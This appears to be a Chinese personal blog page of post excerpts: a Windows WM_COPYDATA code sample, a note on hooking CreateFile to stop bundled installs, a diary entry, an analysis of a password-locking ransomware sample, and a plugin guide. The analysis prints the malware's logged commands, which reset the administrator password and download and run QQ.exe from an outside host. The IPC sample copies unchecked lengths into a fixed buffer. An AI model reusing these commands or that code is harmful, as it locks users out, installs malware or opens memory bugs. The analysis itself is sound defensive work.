使用消息在两程序之间传递消息

消息值
#define WM_COPYDATA 0x004A
传递数据类型 COPYDATASTRUCT
typedef struct tagCOPYDATASTRUCT {
       ULONG_PTR dwData;
       DWORD     cbData;
       PVOID     lpData;
}COPYDATASTRUCT, *PCOPYDATASTRUCT;
发送
CString sendData;
sendData="www.iwonmo.com";
COPYDATASTRUCT copyData = { 0 };
copyData.lpData = sendData.GetBuffer(0);
copyData.cbData = sendData.GetLength();
::SendMessage(hwnd, WM_COPYDATA, (WPARAM)GetSafeHwnd(), (LPARAM)©Data);
sendData.ReleaseBuffer();
接收 需要重载OnCopyData
BOOL CMyDlg::OnCopyData(CWnd* pWnd, COPYDATASTRUCT* pCopyDataStruct) 
{
    if (pCopyDataStruct->cbData > 0)
    {
        char recvData[256] = {0} ;
        strncpy(recvData, (char *)pCopyDataStruct->lpData, pCopyDataStruct->cbData);
        AfxMessageBox(recvData);    
    }
}

程序捆绑安装检测

最近自己在用一些软件的时候,安装过程中总会出现一些“附属”的东西。让自己感觉有些无奈。于是只能想办法在安装过程中去禁止它。通过分析发现主要分为两种方式进行安装。
直接写入
这种方式主要是“附属”文件已经包含在安装包里。安装过程中直接写入的。
从网络获取
这种相对于直接包含在安装包里更加麻烦,因为通过从网络获取的话,“附属”程序是可变的,不是太好判断。
总结
不论这两种方式的哪一种,都是要通过一个特定的API函数去操作的。这里提供一种方法,在安装过程中大家去HOOK这个函数就可以很有效的防治绝大部分软件的“附属”安装。
API
CreateFileA/CreateFileW
例子源码
解压码:wangmu

程序捆绑拦截器.rar

明天,又要工作了。

  明天又要去工作了,这次一走又是一年,很舍不得。忙忙碌碌不知道怎么活着。也许工作着工作着自己就老了,也就没有什么了。
  这次回家,老同学已经有了自己的儿女,看着他们心里不是滋味,上一代人渐渐老去,我们这一代人又有了下一代。这……是个循环。我在不断的重复,一些可大可小的方向。

敲竹杠分析

由于敲竹杠分析起来比较简单,所以直接用分析工具进行分析查看密码了。分为两种情况第一种联网,第二种不联网。于是有了下面的内容:

QQ截图20150307151816.png

联网
   调试线程已开启...

MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:如:想知道密码请联系2925827435 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:如:想知道密码请联系2925827435 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004613a3] 设置窗体[禁止]: 文本:如:想知道密码请联系2925827435 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:10010 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:10010 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004613a3] 设置窗体[禁止]: 文本:10010 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:http:// 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:http:// 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004613a3] 设置窗体[禁止]: 文本:http:// 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:com 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:com 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004613a3] 设置窗体[禁止]: 文本:com 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:/1/zhanghao.htm 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:/1/zhanghao.htm 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004613a3] 设置窗体[禁止]: 文本:/1/zhanghao.htm 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:/1/mima.htm 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:/1/mima.htm 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004613a3] 设置窗体[禁止]: 文本:/1/mima.htm 类:Edit 【放行】
MessageBox ----- : [调用地址:0x00411661] 设置窗体[禁止]: 文本:密码 类:Afx:400000:b:10011:1900015:0 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/1.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/1.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/1.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/2.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/2.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/2.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/3.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/3.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/3.htm 【放行】
MessageBox ----- : [调用地址:0x004024ad] 运行命令:net user Administrator /fullname:想知道密码请联系QQ843379988 【放行】
MessageBox ----- : [调用地址:0x004024ad] 运行命令:net user administrator qaz843379988 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/xiazai.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/xiazai.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/xiazai.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/mubiao.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/mubiao.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/mubiao.htm 【放行】
MessageBox ----- : 打开网址:http://scq.daohaowang.com/QQ.exe 【阻止】
MessageBox ----- : 创建文件:C:\QQ.exe 【阻止】
MessageBox ----- : [调用地址:0x004024ad] 运行命令:C:\QQ.exe 【阻止】
MessageBox ----- : 重启系统:已禁止 --- 默认终止程序 【阻止】
MessageBox ----- : END

调试线程已关闭...

不联网

调试线程已开启...


MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:如:想知道密码请联系2925827435 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:如:想知道密码请联系2925827435 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004613a3] 设置窗体[禁止]: 文本:如:想知道密码请联系2925827435 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:10010 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:10010 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004613a3] 设置窗体[禁止]: 文本:10010 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:http:// 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:http:// 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004613a3] 设置窗体[禁止]: 文本:http:// 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:com 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:com 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004613a3] 设置窗体[禁止]: 文本:com 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:/1/zhanghao.htm 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:/1/zhanghao.htm 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004613a3] 设置窗体[禁止]: 文本:/1/zhanghao.htm 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:/1/mima.htm 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004640cc] 设置窗体[禁止]: 文本:/1/mima.htm 类:Edit 【放行】
MessageBox ----- : [调用地址:0x004613a3] 设置窗体[禁止]: 文本:/1/mima.htm 类:Edit 【放行】
MessageBox ----- : [调用地址:0x00411661] 设置窗体[禁止]: 文本:密码 类:Afx:400000:b:10011:1900015:0 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/1.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/1.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/1.htm 【放行】
MessageBox ----- : [调用地址:0x004024ad] 运行命令:net user Administrator /fullname:如:想知道密码请联系2925827435 【放行】
MessageBox ----- : [调用地址:0x004024ad] 运行命令:net user administrator 10010 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/xiazai.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/xiazai.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/xiazai.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/mubiao.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/mubiao.htm 【放行】
MessageBox ----- : 打开网址:http://jm.20rj.com/1/mubiao.htm 【放行】
MessageBox ----- : 重启系统:已禁止 --- 默认终止程序 【阻止】
MessageBox ----- : END

调试线程已关闭...

动态密码读取地址
http://jm.20rj.com/1/3.htm

MountCss插件说明

  一款Typecho 自用的插件,写这个插件的目的是因为Typecho自带的编辑器没有办法很好的编辑文字,所以写了这么一个插件,可以在线编辑css文件,然后在文章里直接引用就好了。具体的安装步骤如下:
第一步
  将文件上传到publics文件夹下。然后进入后台,点击插件。就会在插件列表看到了。

QQ截图20150306001114.png

第二步
  启用插件

QQ截图20150306001146.png
启用成功后顶部会有提示信息。

阅读全文»